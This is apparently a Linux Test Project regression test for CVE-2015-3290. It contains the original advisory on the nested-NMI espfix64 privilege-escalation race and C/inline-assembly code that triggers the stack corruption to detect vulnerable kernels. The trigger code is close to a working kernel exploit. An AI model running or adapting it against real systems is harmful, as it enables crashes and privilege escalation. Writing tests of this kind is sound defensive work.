// SPDX-License-Identifier: GPL-2.0-or-later
/*
 * Copyright (c) 2017 Pavel Boldin <pboldin@cloudlinux.com>
 */

/*

NOTE: rather than checking for full nested NMI exploitation we simply check
that the NMI stack state can be corrupted with this code.

http://www.openwall.com/lists/oss-security/2015/08/04/8

> +++++ CVE-2015-3290 +++++
>
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed
by:
>
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
>
> The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
>
> You can mitigate CVE-2015-3290 by blocking modify_ldt or
> perf_event_open using seccomp. A fully-functional, portable, reliable
> exploit is privately available and will be published in a week or two.
> *Patch your systems*

And here's a real advisory:

If an NMI returns via espfix64 and is interrupted during espfix64 setup
by another NMI, the return state is corrupt. This is exploitable for
reliable privilege escalation on any Linux x86_64 system in which
untrusted code can arrange for espfix64 to be invoked and for NMIs to be
nested.

Glossing over a lot of details, the basic structure of Linux' nested NMI
handling is:

nmi_handler:
    if (in_nmi) {
        nmi_latched = true;
        return;
    }
    in_nmi = true;
    handle the nmi;
    atomically (this is magic):
        if (nmi_latched) {
            nmi_latched = false;
            start over;
        } else {
            in_nmi = false;
            return and unmask NMIs;
        }

Alas, on x86_64, there is no reasonable way to block NMIs to run the
atomic part of that pseudocode atomically. Instead, the entire atomic
piece is implemented by the single instruction IRET.

But x86_64 is more broken than just that. The IRET instruction does not
restore register state correctly [1] when returning to a 16-bit stack
segment. x86_64 has a complicated workaround called espfix64. If
espfix64 is invoked on return, a well-behaved IRET is emulated by a
complicated scheme that involves manually switching stacks. During the
stack switch, there is a window of approximately 19 instructions between
the start of espfix64's access to the original stack and when espfix64
is done with the original stack. If a nested NMI occurs during this
window, then the atomic part of the basic nested NMI algorithm is
observably non-atomic.

Depending on exactly where in this window the nested NMI hits, the
results vary. Most nested NMIs will corrupt the return context and
crash the calling process. Some are harmless except that the nested NMI
gets ignored. There is a two-instruction window in which the return
context ends up with user-controlled RIP and CS set to __KERNEL_CS.

A careful exploit (attached) can recover from all the crashy failures
and can regenerate a valid *privileged* state if a nested NMI occurs
during the two-instruction window. This exploit appears to work
reasonably quickly across a fairly wide range of Linux versions.

If you have SMEP, this exploit is likely to panic the system. Writing
a usable exploit against a SMEP system would be considerably more
challenging, but it's surely possible.

Measures like UDEREF are unlikely to help, because this bug is outside
any region that can be protected using paging or segmentation tricks.
However, recent grsecurity kernels seem to forcibly disable espfix64, so
they're not vulnerable in the first place.

A couple of notes:

 - This exploit's payload just prints the text "CPL0". The exploit
   will keep going after printing CPL0 so you can enjoy seeing the
   frequency with which it wins. Interested parties could easily
   write different payloads. I doubt that any existing exploit
   mitigation techniques would be useful against this type of
   attack.

 - If you are using a kernel older than v4.1, a 64-bit build of the
   exploit will trigger a signal handling bug and crash. Defenders
   should not rejoice, because the exploit works fine when built
   as a 32-bit binary or (so I'm told) as an x32 binary.

 - This is the first exploit I've ever written that contains genuine
   hexadecimal code. The more assembly-minded among you can have
   fun figuring out why :)

[1] By "correctly", I mean that the register state ends up different
from that which was saved in the stack frame, not that the
implementation doesn't match the spec in the microcode authors' minds.
The spec is simply broken (differently on AMD and Intel hardware,
perhaps unsurprisingly.)

--Andy
*/
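
/*
 * The mitigation mentioned above (blocking modify_ldt and perf_event_open
 * with seccomp) is not part of this test. As a rough sketch only, a
 * defender might install a filter along these lines; a production filter
 * would also have to validate seccomp_data->arch, which is omitted here:
 *
 *	struct sock_filter filter[] = {
 *		BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
 *			 offsetof(struct seccomp_data, nr)),
 *		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_modify_ldt, 2, 0),
 *		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_perf_event_open, 1, 0),
 *		BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
 *		BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
 *	};
 *	struct sock_fprog prog = {
 *		.len = ARRAY_SIZE(filter),
 *		.filter = filter,
 *	};
 *
 *	prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
 *	prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
 */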

#include "config.h"
#include "tst_test.h"
#include "tst_timer.h"

#if HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__))

#include <stdlib.h>
#include <stdio.h>
#include <inttypes.h>
#include <asm/ldt.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/wait.h>
#include <linux/perf_event.h>

#include "lapi/syscalls.h"
#include "tst_safe_pthread.h"

/* Abstractions for some 32-bit vs 64-bit differences. */
#ifdef __x86_64__
# define REG_IP REG_RIP
# define REG_SP REG_RSP
# define REG_AX REG_RAX

struct selectors {
	unsigned short cs, gs, fs, ss;
};

LTP_ATTRIBUTE_UNUSED
static unsigned short *ssptr(ucontext_t *ctx)
{
	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
	return &sels->ss;
}

LTP_ATTRIBUTE_UNUSED
static unsigned short *csptr(ucontext_t *ctx)
{
	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
	return &sels->cs;
}
#else
# define REG_IP REG_EIP
# define REG_SP REG_ESP
# define REG_AX REG_EAX
# define REG_CR2 (REG_SS + 3)

LTP_ATTRIBUTE_UNUSED
static greg_t *ssptr(ucontext_t *ctx)
{
	return &ctx->uc_mcontext.gregs[REG_SS];
}

LTP_ATTRIBUTE_UNUSED
static greg_t *csptr(ucontext_t *ctx)
{
	return &ctx->uc_mcontext.gregs[REG_CS];
}
#endif

static volatile long expected_rsp;
static int running = 1;

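/*
 * Install a 16-bit data segment at LDT entry 0. With the LDT bit and
 * RPL 3 that entry is reachable as selector 0x7, which is the value
 * try_corrupt_stack() later loads into SS to force returns through
 * espfix64.
 */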
static void set_ldt(void)
{
	/* Boring 16-bit data segment. */
	const struct user_desc data_desc = {
		.entry_number = 0,
		.base_addr = 0,
		.limit = 0xfffff,
		.seg_32bit = 0,
		.contents = 0, /* Data, expand-up */
		.read_exec_only = 0,
		.limit_in_pages = 0,
		.seg_not_present = 0,
		.useable = 0
	};

	TEST(tst_syscall(__NR_modify_ldt, 1, &data_desc, sizeof(data_desc)));
	if (TST_RET == -EINVAL) {
		tst_brk(TCONF | TRERRNO,
			"modify_ldt: 16-bit data segments are probably disabled");
	} else if (TST_RET != 0) {
		tst_brk(TBROK | TRERRNO, "modify_ldt");
	}
}

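/*
 * Briefly run with SS set to the 16-bit LDT segment (selector 0x7) so that
 * any NMI delivered in that window has to return through espfix64, then
 * restore the original SS. On the way out we check that we are still at
 * CPL3, that IF is still set and that SS still holds the value we loaded;
 * if we unexpectedly reached CPL0 the code sysrets back to user mode, and
 * any failed check lands on an int3 so the corruption becomes visible.
 */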
static void try_corrupt_stack(unsigned short orig_ss)
{
#ifdef __x86_64__
	asm volatile (
		/* A small puzzle for the curious reader. */
		"mov $2048, %%rbp \n\t"

		/* Save rsp for diagnostics */
		"mov %%rsp, %[expected_rsp] \n\t"

		/*
		 * Let 'er rip.
		 */
		"mov %[ss], %%ss \n\t" /* begin corruption */
		"movl $1000, %%edx \n\t"
		"1: decl %%edx \n\t"
		"jnz 1b \n\t"
		"mov %%ss, %%eax \n\t" /* grab SS to display */

		/* Did we enter CPL0? */
		"mov %%cs, %%dx \n\t"
		"testw $3, %%dx \n\t"
		"jnz 2f \n\t"
		"leaq 3f(%%rip), %%rcx \n\t"
		"movl $0x200, %%r11d \n\t"
		"sysretq \n\t"
		"2: \n\t"

		/*
		 * Stop further corruption. We need to check CPL
		 * first because we need RPL == CPL.
		 */
		"mov %[orig_ss], %%ss \n\t" /* end corruption */

		"subq $128, %%rsp \n\t"
		"pushfq \n\t"
		"testl $(1<<9),(%%rsp) \n\t"
		"addq $136, %%rsp \n\t"
		"jz 3f \n\t"
		"cmpl %[ss], %%eax \n\t"
		"je 4f \n\t"
		"3: int3 \n\t"
		"4: \n\t"
		: [expected_rsp] "=m" (expected_rsp)
		: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
		: "rax", "rcx", "rdx", "rbp", "r11", "flags"
	);
#else
	asm volatile (
		/* A small puzzle for the curious reader. */
		"mov %%ebp, %%esi \n\t"
		"mov $2048, %%ebp \n\t"

		/* Save rsp for diagnostics */
		"mov %%esp, %[expected_rsp] \n\t"

		/*
		 * Let 'er rip.
		 */
		"mov %[ss], %%ss \n\t" /* begin corruption */
		"movl $1000, %%edx \n\t"
		"1: .byte 0xff, 0xca \n\t" /* decl %edx */
		"jnz 1b \n\t"
		"mov %%ss, %%eax \n\t" /* grab SS to display */

		/* Did we enter CPL0? */
		"mov %%cs, %%dx \n\t"
		"testw $3, %%dx \n\t"
		"jnz 2f \n\t"
		".code64 \n\t"
		"leaq 3f(%%rip), %%rcx \n\t"
		"movl $0x200, %%r11d \n\t"
		"sysretl \n\t"
		".code32 \n\t"
		"2: \n\t"

		/*
		 * Stop further corruption. We need to check CPL
		 * first because we need RPL == CPL.
		 */
		"mov %[orig_ss], %%ss \n\t" /* end corruption */

		"pushf \n\t"
		"testl $(1<<9),(%%esp) \n\t"
		"addl $4, %%esp \n\t"
		"jz 3f \n\t"
		"cmpl %[ss], %%eax \n\t"
		"je 4f \n\t"
		"3: int3 \n\t"
		"4: mov %%esi, %%ebp \n\t"
		: [expected_rsp] "=m" (expected_rsp)
		: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
		: "eax", "ecx", "edx", "esi", "flags"
	);
#endif
}

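/*
 * perf hardware sampling events are the user-triggerable NMI source here:
 * each worker thread opens a couple of counters with a high sample
 * frequency so that NMIs keep arriving while try_corrupt_stack() has the
 * 16-bit SS loaded.
 */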
static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
			   int cpu, int group_fd, unsigned long flags)
{
	int ret;

	ret = tst_syscall(__NR_perf_event_open, hw_event, pid, cpu,
			  group_fd, flags);
	return ret;
}

static int event_mlock_kb;
static int max_sample_rate;

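/*
 * Worker thread: open the sampling events and mmap their ring buffers,
 * then hammer try_corrupt_stack() in a loop until the parent clears
 * 'running' or the iteration limit is reached.
 */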
static void *child_thread(void *arg LTP_ATTRIBUTE_UNUSED)
{
	long niter = 0;
	unsigned short orig_ss;

	struct perf_event_attr pe = {
		.size = sizeof(struct perf_event_attr),
		.disabled = 0,
		.exclude_kernel = 0,
		.exclude_hv = 0,
		.freq = 1,
		.sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID|
			PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN|
			PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD,
	};
	/* Workaround bug in GCC 4.4.7 (CentOS6) */
	pe.sample_freq = max_sample_rate / 5;

	struct {
		uint32_t type;
		uint64_t config;
		const char *name;
	} perf_events[] = {
		{
			.type = PERF_TYPE_HARDWARE,
			.config = PERF_COUNT_HW_INSTRUCTIONS,
			.name = "hw instructions",
		},
		{
			.type = PERF_TYPE_HARDWARE,
			.config = PERF_COUNT_HW_CACHE_REFERENCES,
			.name = "hw cache references",
		},
	};

	void *perf_mmaps[ARRAY_SIZE(perf_events)];
	unsigned int i;

	for (i = 0; i < ARRAY_SIZE(perf_events); i++) {
		int fd;

		pe.type = perf_events[i].type;
		pe.config = perf_events[i].config;

		fd = perf_event_open(&pe, 0, -1, -1, 0);
		if (fd == -1) {
			if (errno == EINVAL || errno == ENOENT ||
			    errno == EBUSY)
				tst_brk(TCONF | TERRNO,
					"no hardware counters");
			else
				tst_brk(TBROK | TERRNO, "perf_event_open");
			/* tst_brk exits */
		}

		perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024,
					  PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
		SAFE_CLOSE(fd);
	}

	asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));

	for (niter = 0; running && niter < 1000*1000*1000L; niter++) {

		try_corrupt_stack(orig_ss);

		/*
		 * If we ended up with IF == 0, there's no easy way to fix
		 * it. Instead, make frequent syscalls to avoid hanging
		 * the system.
		 */
		syscall(0x3fffffff);
	}

	for (i = 0; i < ARRAY_SIZE(perf_events); i++)
		if (perf_mmaps[i] != MAP_FAILED)
			SAFE_MUNMAP(perf_mmaps[i], event_mlock_kb * 1024);

	return (void *)niter;
}

#define TIMEOUT		(180)
#define TIME_TO_GIVEUP	(TIMEOUT - 5)
#define TIMER_TYPE	CLOCK_MONOTONIC

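/*
 * Child process: install the 16-bit LDT segment, start one worker thread
 * per CPU and let them probe for TIME_TO_GIVEUP seconds. If nothing
 * crashed, report how many iterations survived.
 */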
static void do_child(void)
{
	int i, ncpus;
	pthread_t *threads;
	long iter, total_iter = 0;

	tst_res(TINFO, "attempting to corrupt nested NMI stack state");

	set_ldt();

	ncpus = tst_ncpus();
	threads = SAFE_MALLOC(sizeof(*threads) * ncpus);

	for (i = 0; i < ncpus; i++)
		SAFE_PTHREAD_CREATE(&threads[i], NULL, child_thread, NULL);

	sleep(TIME_TO_GIVEUP);
	running = 0;

	for (i = 0; i < ncpus; i++) {
		SAFE_PTHREAD_JOIN(threads[i], (void **)&iter);
		total_iter += iter;
	}
	free(threads);

	tst_res(TPASS, "can't corrupt nested NMI state after %ld iterations",
		total_iter);
}

static void setup(void)
{
	/*
	 * According to perf_event_open's manpage, the official way of
	 * knowing if perf_event_open() support is enabled is checking for
	 * the existence of the file /proc/sys/kernel/perf_event_paranoid.
	 */
	if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)
		tst_brk(TCONF, "Kernel doesn't have perf_event support");

	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb",
			"%d", &event_mlock_kb);
	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate",
			"%d", &max_sample_rate);
}

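/*
 * The forked child does the actual probing. If it is killed by SIGSEGV
 * the NMI return state was corrupted and the kernel is vulnerable; a
 * nonzero exit status from the child is reported as-is.
 */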
static void run(void)
{
	pid_t pid;
	int status;

	pid = SAFE_FORK();
	if (pid == 0) {
		do_child();
		return;
	}

	SAFE_WAITPID(pid, &status, 0);
	if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV)
		tst_res(TFAIL, "corrupted NMI stack");
	else if (WIFEXITED(status) && WEXITSTATUS(status) != 0)
		tst_res(WEXITSTATUS(status), "Propagate child status");
}

static struct tst_test test = {
	.forks_child = 1,
	.needs_root = 1,
	.needs_checkpoints = 1,
	.setup = setup,
	.timeout = TIMEOUT,
	.test_all = run,
	.tags = (const struct tst_tag[]) {
		{"linux-git", "9b6e6a8334d5"},
		{"CVE", "2015-3290"},
		{}
	}
};

#else /* HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__)) */

TST_TEST_TCONF("no perf_event_attr or not (i386 or x86_64)");

#endif